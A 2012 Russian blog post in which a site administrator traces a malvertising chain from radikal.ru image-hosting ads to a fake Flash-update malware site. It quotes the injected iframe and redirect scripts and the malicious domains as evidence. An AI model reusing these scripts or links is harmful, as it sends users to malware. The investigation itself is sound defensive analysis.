Information Security
May 29 2012

Вирусы с радикала. Опять!

История началась с смски «срочно выйди в скайп» — писал клиент, хозяин одного из сайтов, которому я помогаю в обеспечении жизнедеятельности этого самого сайта. Оказалось, он получил письмо от некоего Alexander Goryachev с утверждением, что сайт скорее всего заражен.

Вот текст письма:

Здравствуйте.

Меня зовут Александр Горячев, я аналитик компании «Доктор Веб».

Имеется информация, что при открытии изображений в данной теме yarportal.ru/topic324608s0.html на формуе yarportal.ru происходит переадресация с сайта-хостинга radikal.ru на мошеннический сайт, который распространяет вредоносные программы для мобильных устройств под видом обновлений ПО. То есть если используется мобильное устройства (телефон, смартфон), то сначала открывается страничка radikal.ru с нужным изображением, но затем почти сразу происходит перенаправление на мошеннический сайт (пример — newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413). Если открывать изображения непосредственно на самом хостинге, без промежуточного звена в лице yarportal.ru, такого поведения не наблюдается. Возможно, yarportal.ru был взломан или на нем используется недобросовестная рекламная модель, о которой владельцы портала могут и не знать.

Из контактной информации наиболее подходящим был ваш, поэтому было решено сообщить по нему. Можете ли вы как-то прокомментировать ситуацию и заняться решением данного вопроса? Будем признательны, если вы сможете предоставить какую-либо информацию.

Спасибо.


Сайт представляет из себя достаточно большой форум, соответственно юзеры выкладывают картинки куда угодно, а потом ставят туда ссылки в том виде, который им показывает картинкохостинг. Радикал, увы, один из самых популярных.

Попытался повторить действия аналитика и посканить трафик, который при этом идет на мобильное устройство. Действительно, редирект на этот самый newbrwzer происходит, но не совсем понятно, при чем тут наш сайт. Анализ трафика показал, что вредоносную ссылку выдает сам радикал примерно следующим путем:

$ curl -s http://radikal.ru/F/s45.radikal.ru/i107/1205/76/593cc990c6ae.jpg.html | grep adv-port
<script>document.write('<iframe border="0" marginwidth="0" marginheight="0" src="http://adv-port.com/view2.php?title='+document.title+'&referrer='+document.referrer+'&lang='+navigator.language+'"frameborder="0" height="120" scrolling="no" width="240"></iframe>');</script>


Далее это отсылает браузер на страницу вида:
http://adv-port.com/view2.php?title=%D0%A0%D0%B0%D0%B4%D0%B8%D0%BA%D0%B0%D0%BB-%D0%A4%D0%BE%D1%82%D0%BE%20::%20%D0%A3%D0%B2%D0%B5%D0%BB%D0%B8%D1%87%D0%B5%D0%BD%D0%BD%D0%BE%D0%B5%20%D0%B8%D0%B7%D0%BE%D0%B1%D1%80%D0%B0%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5&referrer=http://yarportal.ru/topic324608s0.html&lang=en


Где встречается следующий код:
<script src="http://adv-port.com/ctr.php?ref='+document.referrer+'"></script>


По ссылке adv-port.com/ctr.php?ref='+document.referrer+' имеется следующий код:
function error() {
 top.location='http://network-sitead.com/';
}


По этой ссылке есть следующий код:
<script src='http://on-line-adv.com/2.php'></script>


Загрузка этой ссылки выдает следующее:
document.location='http://newbrwzer.com/?a=u264w264z413x4u2w4x2t2v2y3u2x494q233c4y2b4w26413'


Т.е. в конце-концов браузер действительно попадает на страничку с предложением «обновить» флеш-плеер. Чуть позже выяснилось, что некоторые пользователи действительно «обновляют» его: yarportal.ru/topic332505.html

По итогам этого «расследования» возникает 3 вопроса:
  1. Когда радикал умрет с такой своей рекламной политикой? Это уже далеко не первый случай распространения вирусов через них.
  2. Откуда в Dr.Web берут аналитиков, которые не удосуживаются посмотреть на трафик через wireshark/tcpdump?
  3. А может это просто я дурак и сайт действительно заражен? :)


PS: Аналитик действительно имеет отношение к Dr.Web, его статья есть на хабре в оф. блоге компании habrahabr.ru/company/drweb/blog/142993

UPD: не использовать радикал — это, конечно, отличная мысль, жаль, очень близка к утопии. Куда более интересно, почему там регулярно появляются вирусы, и сколько еще вот таких же «обновлений» успело поставиться с этого сайта, аудитория у радикала ого-го )

UPD2: не надо предлагать альтернативы радикалу, я их и так знаю, спасибо.
+45
7.4k 26
Comments 108
Top of the day